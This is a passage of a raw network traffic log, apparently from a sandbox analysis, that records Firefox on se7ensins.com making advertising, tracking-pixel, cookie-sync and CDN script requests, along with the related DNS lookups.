AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---

firefox.exe

Remote address:

69.173.156.148:443

Request

GET /exchange/sync.php?p=pbs-triple13&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1--- HTTP/1.1
Host: pixel.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Referer: https://www.se7ensins.com/
Connection: keep-alive

Response

HTTP/1.1 302 Found

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: 17c962550296893d145ef1b8078fc6d6
Location: https://s2s.t13.io/setuid?bidder=rubicon&uid=LWMWFGYN-18-EB0X&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---
Content-Type: text/html
content-length: 0
set-cookie: khaos=LWMWFGYN-18-EB0X; Max-Age=31536000; Expires=Mon, 26 May 2025 02:06:46 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
set-cookie: receive-cookie-deprecation=1; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:06:46 GMT; Path=/; Domain=.rubiconproject.com; Secure; HTTPOnly; SameSite=None; Partitioned;
GET

https://pixel.rubiconproject.com/tap.php?v=223352&nid=4584&put=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA

firefox.exe

Remote address:

69.173.156.148:443

Request

GET /tap.php?v=223352&nid=4584&put=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA HTTP/1.1
Host: pixel.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://onetag-sys.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 204 No Content

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: 17c962550296893d145ef1b8078fc6d6
Content-Type: image/gif
GET

https://cdn.browsiprod.com/static_js/freestar/se7ensins/PreEngine_desktop_2023-10-25T10:24:38.814.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /static_js/freestar/se7ensins/PreEngine_desktop_2023-10-25T10:24:38.814.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: script
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
content-length: 618
date: Mon, 29 Jan 2024 15:09:04 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Wed, 25 Oct 2023 10:24:40 GMT
etag: "a1b89e9f4930a943fa5d6a2b9bf1026d"
x-amz-server-side-encryption: AES256
cache-control: max-age=31536000
x-amz-version-id: bJnZOAfbBqYkGJ32S22GcrF5M8J2PrwU
accept-ranges: bytes
server: AmazonS3
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: aZTwwBNi0n3Ef5p8I_4KOdXWBKDXxB-x9EzWixePFZaRVZTbeARqGQ==
age: 10148263
GET

https://cdn.browsiprod.com/sd/apps/middy/middy-desktop-4.25.21.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /sd/apps/middy/middy-desktop-4.25.21.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: script
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
date: Wed, 15 May 2024 14:34:03 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Sun, 12 May 2024 13:11:40 GMT
etag: W/"9dc36f185aec34bbd8670bb3233703c9"
x-amz-server-side-encryption: AES256
cache-control: public,max-age=31536000
x-amz-version-id: lCrYXMCtWZnMVeqPYbPtzB38NRJIAl_Q
server: AmazonS3
content-encoding: br
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: 2MgNE9fBVt4xoOOVq0UiQXb5Mt5FzfO1vpHvHTtdbbfb0ymtSqWjxg==
age: 905564
GET

https://cdn.browsiprod.com/abd.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /abd.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: script
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Sun, 08 Jul 2018 12:47:26 GMT
x-amz-version-id: rKwk7MJeT07HcAaaVBBDA7s6dDzRWDJ1
server: AmazonS3
content-encoding: br
date: Sat, 25 May 2024 19:06:22 GMT
etag: W/"bc70a2c30105ea2f98d83f5ad623fc39"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: BaPm6OuR1vSjOgVdHWGz-ASaJMkxlWeyqYw4sjeaUHFzVe4zO4QgrA==
age: 25231
GET

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /generic-templates/freestar/0.1/template.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript
date: Wed, 24 Jan 2024 22:37:27 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Mon, 04 Sep 2023 06:42:06 GMT
etag: W/"d1c8e1c63ee9cd938226d57d278ad667"
x-amz-server-side-encryption: AES256
cache-control: max-age=31536000
x-amz-version-id: K_8cyH.lJQLcI2sZzyr9AUFZLXxIN0SG
server: AmazonS3
content-encoding: br
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: YkYwAfy4lTjU1qN0HHv__Uj4jaKCraUR0ktckDH-bJw0xqGaKp1lHg==
age: 10553368
GET

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /generic-templates/freestar/0.1/template.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript
date: Wed, 24 Jan 2024 22:37:27 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Mon, 04 Sep 2023 06:42:06 GMT
etag: W/"d1c8e1c63ee9cd938226d57d278ad667"
x-amz-server-side-encryption: AES256
cache-control: max-age=31536000
x-amz-version-id: K_8cyH.lJQLcI2sZzyr9AUFZLXxIN0SG
server: AmazonS3
content-encoding: br
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: hwk03p7ICgzyCsHqlcBENSKadaynlGOlML1sgzFJuWDgGpSMWnkl6g==
age: 10553368
GET

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /generic-templates/freestar/0.1/template.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript
date: Wed, 24 Jan 2024 22:37:27 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Mon, 04 Sep 2023 06:42:06 GMT
etag: W/"d1c8e1c63ee9cd938226d57d278ad667"
x-amz-server-side-encryption: AES256
cache-control: max-age=31536000
x-amz-version-id: K_8cyH.lJQLcI2sZzyr9AUFZLXxIN0SG
server: AmazonS3
content-encoding: br
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ce855a64257bf53f14f7868e50f037d4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: g1juiMxOqBPKIiR4FhJEpUntoBrrmJDd26vSA7gkuDYV3IWvR0MMKQ==
age: 10553368
DNS

33.140.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.140.162.3.in-addr.arpa

IN PTR

Response

33.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-33dub56r cloudfrontnet
DNS

router.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

router.infolinks.com

IN A

Response

router.infolinks.com

IN A

172.66.42.247

router.infolinks.com

IN A

172.66.41.9
DNS

router.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

router.infolinks.com

IN A

Response

router.infolinks.com

IN A

172.66.42.247

router.infolinks.com

IN A

172.66.41.9
DNS

router.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

router.infolinks.com

IN AAAA

Response
DNS

ssum-sec.casalemedia.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssum-sec.casalemedia.com

IN A

Response

ssum-sec.casalemedia.com

IN A

172.64.151.101

ssum-sec.casalemedia.com

IN A

104.18.36.155
GET

https://ssum-sec.casalemedia.com/usermatch?s=184674&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D

firefox.exe

Remote address:

172.64.151.101:443

Request

GET /usermatch?s=184674&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D HTTP/2.0
host: ssum-sec.casalemedia.com
